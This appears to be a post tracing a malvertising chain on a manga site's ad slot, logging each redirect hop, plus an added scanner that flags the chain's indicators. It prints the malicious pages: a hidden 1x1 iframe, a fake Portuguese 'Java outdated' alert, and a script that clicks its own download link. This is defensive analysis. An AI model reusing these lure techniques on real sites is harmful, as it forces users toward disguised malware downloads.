On the main page, between the "My Follows" and the "Popular Series" lists, there's an ad space:
<div class="general_box clearfix"><iframe src='/ads/mari300.html' frameborder='0' scrolling='no' style='border:0;padding:0;margin:0;width:300px;height:250px;'></iframe></div>
REQUEST: GET hxxp://vatoto.com/ads/mari300.html
RESPONSE: text/html:
<!DOCTYPE html>
<html>
<head>
<style>
html, body {margin:0; padding:0}
</style>
<title>Ad Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<script type='text/javascript' src='http://ads.qadserve.com/t?id=d4cd04fe-9560-498b-9fd1-b6ea60e57822&size=300x250'></script>
</body>
</html>
REQUEST: GET hxxp://ads.qadserve.com/t?id=d4cd04fe-9560-498b-9fd1-b6ea60e57822&size=300x250
RESPONSE: application/javascript:
document.write('<SCR'+'IPT TYPE="text/javascript" SRC="http://ib.adnxs.com/ttj?id=2547769&size=300x250"></SCR'+'IPT>');
REQUEST: GET hxxp://ib.adnxs.com/ttj?id=2547769&size=300x250
RESPONSE: text/html (in spite of this clearly returning JavaScript; I added newlines in a couple of places to make the actual redirection more obvious):
(function(){
function r(r){try{if(!window.location.ancestorOrigins)return;for(var n=0,t=window.location.ancestorOrigins.length;n<t;n++){r.call(null,window.location.ancestorOrigins[n],n)}}catch(o){}return[]}function n(r){var n=[],t;do{t=t?t.parent:window;try{r.call(null,t,n)}catch(o){n.push({})}}while(t!=window.top);return n}var t=n(function(r,n){n.push({referrer:r.document.referrer||null,location:r.location.href||null})});r(function(r,n){t[n].ancestor=r});var o='';for(var e=t.length-1;e>=0;e--){o=t[e].location;if(!o&&e>0){o=t[e-1].referrer;if(!o){o=t[e-1].ancestor}}if(o){break}}o=encodeURIComponent(o);
var i='http://ib.adnxs.com/ttj?ttjb=1&bdref='+o+'&id=2547769&size=300x250';
document.write('<script src="'+i+'"></'+'script>')})();
REQUEST: GET hxxp://ib.adnxs.com/ttj?ttjb=1&bdref=http%3A%2F%2Fwww.batoto.net%2F&id=2547769&size=300x250
RESPONSE: application/javascript:
document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://nym1.ib.adnxs.com/if?enc=ukkMAiuHhj_029eBc0aEPxsv3SQGgaU_9NvXgXNGhD-6SQwCK4eGPxy3HcaQeoEeRezi_nTj9XsdQaZTAAAAADngJgB2AgAA5gYAALoAAAA8tsIASBMGAAAAAQBVU0QAVVNEACwB-gDYdgAAzXsAAgUCAQIAAI4APSfpOQAAAAA.&cnd=AS750-BR&udj=update_campaign(12760636%2C+false)&vpid=77&apid=263679&referrer=http%3A%2F%2Fwww.batoto.net%2Fads%2Fmari300.html&media_subtypes=1&ct=0&dlo=1"></iframe>');document.write('<scr' + 'ipt src="http://cdn.adnxs.com/ANX_async_usersync.js"></scr'+'ipt>');
REQUEST: GET hxxp://nym1.ib.adnxs.com/if?enc=ERoMocEQqj8bL90kBoGlPxsv3SQGgaU_r0fhehSuvz8zMzMzMzPDP93skZK1Dip7Rezi_nTj9Xu_QKZTAAAAADngJgB2AgAArwcAAAIAAADY7vkASBMGAAAAAQBVU0QAVVNEACwB-gDYdgAAzrUAAgUAAQIAAI4AYCZbgAAAAAA.&cnd=!ySMh5Aiho4ACENjd5wcYACDIphgwADgAQABIrw9QucCbAVgAYLUGaABwBHjkA4ABBIgB5AOQAQGYAQGgAQGoAQOwAQC5ATMzMzMzM8M_wQEzMzMzMzPDP8kB9ig4Urx0-T_ZAQAAAAAAAPA_4AEA9QGamZk-&ccd=!QAZnOQiho4ACENjd5wcYyKYYIAA.&udj=uf('a'%2C+341838%2C+1403404479)%3Buf('c'%2C+4198817%2C+1403404479)%3Buf('r'%2C+16379608%2C+1403404479)%3B&vpid=77&apid=263679&referrer=http%3A%2F%2Fwww.batoto.net%2Fads%2Fmari300.html&media_subtypes=1&ct=0&dlo=1
RESPONSE: text/html:
<iframe src="http://cher.ehomestudy.com/300x250.html" frameborder="0" scrolling="no" width="300" height="250"></iframe>
REQUEST: GET hxxp://cher.ehomestudy.com/300x250.html
RESPONSE: text/html:
<html><head><title></title><meta name="robots" content="noindex"></head><body><iframe src="http://dl.lhpuk.com/topic/java/go.php?code=java&country=BR&aid=102&ext=3" frameborder="0" scrolling="no" width="1" height="1"></iframe></body></html>
Oddly enough, even though this last iframe has dl.lhpuk.com in its src attribute, the next request is actually made to soft.zzstny.com...
REQUEST: GET hxxp://soft.zzstny.com/topic/java/go.php?code=java&country=BR&aid=102&ext=3
RESPONSE: text/html:
<html><head><meta charset="utf-8"><title>Download Java for Your PC</title></head><body><a href="/topic/java/download.php?country=BR&ext=3&aid=102" id="reloc" target="_top" style="text-decoration:none;color:#fff;">loading...</a><script type="text/javascript">function invokeClick(o){ if(o.click)o.click(); else if(o.fireEvent)o.fireEvent("onclick"); else if(document.createEvent) { var evt = document.createEvent("MouseEvents"); evt.initEvent("click", true, true); o.dispatchEvent(evt); }} alert("ATENÇÃO! \nSua Versão do Java está Desatualizada, Há Riscos de Segurança, \nPor Favor Atualize Agora!");invokeClick(document.getElementById("reloc"));</script></body></html>
And this one creates a link, generates an alert(), and programmatically clicks on the link it created itself. Pretty sneaky stuff.
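The chain traced above can be triaged mechanically from a proxy or HAR capture. The following is an added example, not part of the original post: a small Node.js scanner that flags the indicators seen in these responses (split `<script>` writes, a 1x1 iframe, a `target="_top"` link clicked by script). The rule names, the `scanResponse` and `scanChain` functions, and the abbreviated sample bodies are assumptions made for illustration.

```javascript
// Added example (not from the original post): flag forced-redirect indicators
// in captured ad responses. Rule names and patterns are illustrative assumptions.
const RULES = {
  // <script> tag split across string literals inside document.write()
  'split-script-write': b => /document\.write\([^)]*<scr['"]\s*\+\s*['"]ipt/i.test(b),
  // iframe sized 0 or 1 pixel in both dimensions, i.e. invisible to the user
  'hidden-iframe': b => (b.match(/<iframe\b[^>]*>/gi) || []).some(tag =>
    /\bwidth=["']?[01]["']?[\s>]/i.test(tag) && /\bheight=["']?[01]["']?[\s>]/i.test(tag)),
  // link that navigates the top-level page from inside a frame
  'top-target-link': b => /<a\b[^>]*\btarget=["']?_top\b/i.test(b),
  // click generated by script rather than by a user gesture
  'synthetic-click': b => /\.click\(\)|fireEvent\(["']onclick["']\)|dispatchEvent\(/.test(b),
  // modal dialog used as a lure before the navigation
  'modal-lure': b => /\balert\(/.test(b),
};

// Return the ids of every rule that matches one response body.
function scanResponse(body) {
  return Object.keys(RULES).filter(id => RULES[id](body));
}

// Scan each hop; a _top link plus a scripted click means a forced navigation.
function scanChain(chain) {
  return chain.map(({ host, body }) => {
    const hits = scanResponse(body);
    const forcedNav = hits.includes('top-target-link') && hits.includes('synthetic-click');
    return { host, hits, forcedNav };
  });
}

// Constructed sample: abbreviated copies of four responses quoted in the post.
const SAMPLE_CHAIN = [
  { host: 'ads.qadserve.com',
    body: `document.write('<SCR'+'IPT TYPE="text/javascript" SRC="..."></SCR'+'IPT>');` },
  { host: 'nym1.ib.adnxs.com',
    body: `<iframe src="..." frameborder="0" scrolling="no" width="300" height="250"></iframe>` },
  { host: 'cher.ehomestudy.com',
    body: `<body><iframe src="..." frameborder="0" scrolling="no" width="1" height="1"></iframe></body>` },
  { host: 'soft.zzstny.com',
    body: `<a href="/topic/java/download.php" id="reloc" target="_top">loading...</a>` +
          `<script>function invokeClick(o){ if(o.click)o.click(); } alert("...");` +
          `invokeClick(document.getElementById("reloc"));</script>` },
];

for (const r of scanChain(SAMPLE_CHAIN)) {
  console.log(r.host.padEnd(22), r.forcedNav ? 'FORCED-NAV' : '-', r.hits.join(','));
}
```

Only the final hop is marked as a forced navigation; the earlier hops surface as weaker signals that are worth correlating when they occur in the same chain.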